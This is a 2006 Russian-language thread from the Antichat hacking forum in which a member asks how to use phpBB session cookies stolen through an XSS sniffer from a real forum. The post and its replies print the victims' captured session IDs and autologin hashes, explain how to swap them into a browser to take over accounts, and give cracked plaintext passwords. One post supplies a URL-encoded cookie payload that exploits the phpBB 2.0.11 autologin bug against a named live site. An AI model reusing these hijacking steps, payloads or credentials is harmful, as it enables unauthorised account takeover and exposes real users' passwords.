HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Как подменить куки на PhpBB?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Как подменить куки на PhpBB?
  #1  
Старый 14.01.2006, 01:51
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


Question Как подменить куки на PhpBB?
В поиске по форуму почему-то не нашел. Извиняюсь если уже было.
По PhpBB 2.0.14 вроде. Использовал XSS WJ.
На сниффер приходят такого вида кукисы:

1) REFERER=http://сайт.ru/viewtopic.php?t=144
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0 :"";s:6:"userid";s:2:"71";}; phpbb2mysql_sid=fb92f3ae9449faa5f5638a7b8f82665c; b=b; phpbb2mysql_t=a:1:{i:144;i:1137188123;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

2) REFERER=http://сайт/viewtopic.php?p=1000&sid=7f719a7904ea3855d0e19651e a5dffb5
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:3 2:"c3b1cdacd926a27c6d2ba4edea2315d9";s:6:"userid"; i:4;}; phpbb2mysql_sid=7f719a7904ea3855d0e19651ea5dffb5; b=b; phpbb2mysql_t=a:1:{i:144;i:1137187244;}

3) QUERY=mail=к; comlog=Arsenio; b=b; hotlog=1; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c38 fc265ba6bd19e91716b07459e0840";s:6:"userid";i:88;} ; phpbb2mysql_sid=12e1027040bd3158d7f8ef8d63cab91d; b=b; phpbb2mysql_t=a:1:{i:136;i:1137186727;}

и только один раз вот такое:
4)REFERER=http://сайт.ru/viewtopic.php?t=99&postdays=0&postorder=asc&start= 180&sid=3c0662d34eb3e23da30b84d19347d2ec
QUERY=; sessionid=2038548; b=b; hotlog=1; phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=3c0662d34eb3e23da30b84d19347d2ec; b=b

Че-то не понимаю что с ними делать - свои когда заменяю ничего не происходит. Почему только в одном месте есть сессион хэш? Или надо расшифровывать обязательно? Тогда что конкретно расшифровывать? Нет ли там соли как в ИПБ?

Заранее спасибо. С меня репа.
 
Ответить с цитированием

  #2  
Старый 14.01.2006, 02:08
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Цитата:
Сообщение от podkashey  
В поиске по форуму почему-то не нашел. Извиняюсь если уже было.
По PhpBB 2.0.14 вроде. Использовал XSS WJ.
На сниффер приходят такого вида кукисы:

1) REFERER=http://сайт.ru/viewtopic.php?t=144
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0 :"";s:6:"userid";s:2:"71";}; phpbb2mysql_sid=fb92f3ae9449faa5f5638a7b8f82665c; b=b; phpbb2mysql_t=a:1:{i:144;i:1137188123;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

2) REFERER=http://сайт/viewtopic.php?p=1000&sid=7f719a7904ea3855d0e19651e a5dffb5
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:3 2:"c3b1cdacd926a27c6d2ba4edea2315d9";s:6:"userid"; i:4;}; phpbb2mysql_sid=7f719a7904ea3855d0e19651ea5dffb5; b=b; phpbb2mysql_t=a:1:{i:144;i:1137187244;}

3) QUERY=mail=к; comlog=Arsenio; b=b; hotlog=1; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c38 fc265ba6bd19e91716b07459e0840";s:6:"userid";i:88;} ; phpbb2mysql_sid=12e1027040bd3158d7f8ef8d63cab91d; b=b; phpbb2mysql_t=a:1:{i:136;i:1137186727;}

и только один раз вот такое:
4)REFERER=http://сайт.ru/viewtopic.php?t=99&postdays=0&postorder=asc&start= 180&sid=3c0662d34eb3e23da30b84d19347d2ec
QUERY=; sessionid=2038548; b=b; hotlog=1; phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=3c0662d34eb3e23da30b84d19347d2ec; b=b

Че-то не понимаю что с ними делать - свои когда заменяю ничего не происходит. Почему только в одном месте есть сессион хэш? Или надо расшифровывать обязательно? Тогда что конкретно расшифровывать? Нет ли там соли как в ИПБ?

Заранее спасибо. С меня репа.
Соли нету !!!
Зпходи в Опере в куки у удоляй все кроме hpbb2mysql_data и phpbb2mysql_sid и подстовляй свое и все !!!
 
Ответить с цитированием

  #3  
Старый 14.01.2006, 02:10
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
и еще одно если не зайдет то тогда phpbb2mysql_data:вот точто здесь должно быть биг к кокомуто декодуру и кодируй в URL и встовляй !!!
 
Ответить с цитированием

  #4  
Старый 14.01.2006, 03:07
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
По умолчанию
2) REFERER=http://сайт/viewtopic.php?p=1000&sid=7f719a7904ea3855d0e19651e a5dffb5
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:3 2:"c3b1cdacd926a27c6d2ba4edea2315d9";s:6:"userid"; i:4;}; phpbb2mysql_sid=7f719a7904ea3855d0e19651ea5dffb5; b=b; phpbb2mysql_t=a:1:{i:144;i:1137187244;}
Иль просто расшифруй хешь c3b1cdacd926a27c6d2ba4edea2315d9 вот я те расшифровал пароль этого хеша babitch
 
Ответить с цитированием

  #5  
Старый 14.01.2006, 03:11
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию
c38fc265ba6bd19e91716b07459e0840:loko
 
Ответить с цитированием

  #6  
Старый 14.01.2006, 04:07
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
Не понимаю в чем дело, но сую в оперу куки, а зайти все равно не получается. Хотя пароль расшифрованный один подошел.
Еще интересен такой момент: Там где пароль loko, стоит юзер айди 88 (если я правильно понимаю), а такого юзера нету (опять же смотрел через ссылку из списка пользователей u=88). Такое возможно? И как так быстро нашелся пароль babitch - он в словарях есть или так быстро перебирается? Через http://passcrack.spb.ru искали?
Есть ли на PhpBB 2.0.14 проблемы со входом в админку как на IPB (одного хэша мало)?
P.S. Всем спасибо и плюсы к репе.
 
Ответить с цитированием

  #7  
Старый 14.01.2006, 04:15
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
По поводу 88 извиняюсь - ступил - не тот форум смотрел.
Ну и еще хотелось бы узнать почему то пхп_дата, то в одном месте появляется сессионхэш?
 
Ответить с цитированием

  #8  
Старый 14.01.2006, 05:01
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию
Цитата:
Сообщение от podkashey  
ище хотелось бы узнать почему то пхп_дата, то в одном месте появляется сессионхэш?
вощето если у юзака не стоит опция автологин то бужешь токо сессию ловить в снифере.
 
Ответить с цитированием

  #9  
Старый 14.01.2006, 05:42
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
Имелост в виду:
QUERY=; sessionid=2038548; b=b; hotlog=1; phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=3c0662d34eb3e23da30b84d19347d2ec; b=b
а конкретнее sessionhash. Что это?
 
Ответить с цитированием

  #10  
Старый 14.01.2006, 16:03
Grom
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499

Репутация: 0
По умолчанию
Вопрос, мона, не нашел топа с темой.
Помните баг phpbb с куками. Нашел версию 2.0.11 пытаюсь в Опере подставлять куку a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D, ни черта не получается, так и остаюсь со своими правами. Вот линк, если кто могет помочь http://forum.homebusiness.ru/
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Уязвимости CMS / форумов 6 26.10.2006 21:30
Куки в phpbb 2.0.17 - 2.0.18 Manoz Уязвимости CMS / форумов 25 26.01.2006 03:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.